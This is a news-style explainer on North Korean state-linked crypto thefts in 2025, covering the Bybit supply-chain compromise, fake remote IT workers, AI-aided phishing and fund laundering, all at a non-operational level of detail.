How North Korean Hackers Pulled Off a Record $2.02 Billion Crypto Theft in 2025

U.S. authorities attributed the operation to North Korean actors tracked as "TraderTraitor", a hacking cluster associated with the country’s broader cyber apparatus.

Threat‑intelligence analysis indicates that the breach was tied to a supply‑chain compromise involving trojanized software, allowing attackers to gain trusted access inside the ecosystem used by the exchange. According to CrowdStrike’s threat landscape research, a cluster it tracks as PRESSURE CHOLLIMA carried out the attack by distributing malicious software through a compromised development pipeline.

Once access was obtained, attackers transferred large amounts of cryptocurrency out of exchange infrastructure and began dispersing the funds across thousands of blockchain addresses to obscure the trail.

Fewer attacks, but far bigger payouts

Blockchain analytics show that the $2.02 billion stolen by North Korean groups in 2025 represented a 51% increase year‑over‑year, even though the number of attacks declined.

This shift reflects a strategic change: instead of many smaller hacks, the attackers increasingly pursue high‑impact intrusions targeting major crypto platforms and financial services infrastructure.

Researchers describe this approach as “industrialized” cybercrime, where operations are coordinated at scale and supported by dedicated infrastructure for access, theft, and laundering.

Key tactics behind the 2025 crypto theft wave

Supply‑chain compromise

The Bybit incident illustrates how attackers increasingly exploit trusted software relationships rather than directly hacking an exchange.

By compromising developer infrastructure or software dependencies, attackers can deliver trojanized updates or tools that victims install themselves—giving adversaries privileged access without triggering traditional security defenses.

Supply‑chain attacks have become a defining technique in modern cyber operations because they leverage the trust embedded in software ecosystems.

AI‑enabled social engineering

Threat‑intelligence reporting indicates that adversaries increasingly use AI tools to improve phishing, impersonation, and reconnaissance, allowing them to scale social‑engineering campaigns and craft more convincing communications.

AI can automate tasks such as generating phishing messages, researching targets, and creating realistic personas—making it easier for attackers to gain credentials or persuade employees to grant access.

Fake remote IT workers

Another major tactic involves placing North Korean operatives inside companies through fraudulent remote‑employment schemes.

Authorities say the DPRK has built networks of individuals who use stolen or fabricated identities to obtain remote developer or IT jobs at technology firms—including companies connected to the crypto ecosystem.

Once employed, these workers can:

• gain legitimate access to internal systems
• collect sensitive credentials
• help facilitate cyber theft or laundering operations

Large tech companies have reported blocking thousands of such attempts, highlighting the scale of the effort.

Social engineering and insider infiltration

Security researchers say North Korean operations increasingly combine digital intrusions with “offline infiltration,” meaning access gained through human relationships—employees, contractors, or partners—rather than purely technical exploits.

This hybrid model allows attackers to bypass many traditional cybersecurity controls.

The role of specialized hacker groups

Security companies track North Korean cyber operations using cluster names rather than a single organization.

For example:

• PRESSURE CHOLLIMA – linked by CrowdStrike to the massive supply‑chain compromise that enabled the $1.46B Bybit theft.
• Other DPRK‑nexus clusters – including groups often associated with the broader Lazarus ecosystem—conduct espionage, financial theft, and infrastructure compromise across the crypto sector.

Public reporting provides fewer confirmed operational details tying specific 2025 incidents to clusters such as FAMOUS CHOLLIMA or STARDUST CHOLLIMA, though they are tracked as part of North Korea’s broader cyber‑operations landscape.

Laundering the stolen cryptocurrency

After major heists, attackers typically move funds through thousands of blockchain addresses and multiple cryptocurrencies, often converting assets rapidly to obscure their origin.

Investigations show that North Korean operators also rely on mixing services, decentralized exchanges, and cross‑chain bridges to further complicate tracing efforts.

In some cases, a large share of stolen funds can be moved or laundered within weeks of the initial breach.

Why governments see this as a national‑security issue

U.S. and international officials warn that these cyber operations are not just criminal activity—they are a revenue source for the North Korean state.

Government statements say proceeds from cybercrime help the regime evade sanctions and support weapons development programs, including ballistic missiles and nuclear capabilities.

Because of that link, law‑enforcement agencies have increased efforts to track laundering networks and disrupt the infrastructure behind the operations.

The bigger picture for crypto security

The 2025 record theft highlights a major shift in the threat landscape:

• Nation‑state actors are targeting crypto platforms as strategic financial infrastructure.
• Attack campaigns combine technical exploits with human infiltration and deception.
• Individual breaches can now reach billion‑dollar scale.

Security researchers say the trend underscores the need for stronger supply‑chain security, identity verification for remote workers, and advanced monitoring of blockchain transactions.

As crypto adoption grows, the methods refined in 2025 suggest that state‑sponsored cybercrime will remain one of the industry’s most persistent—and sophisticated—security challenges.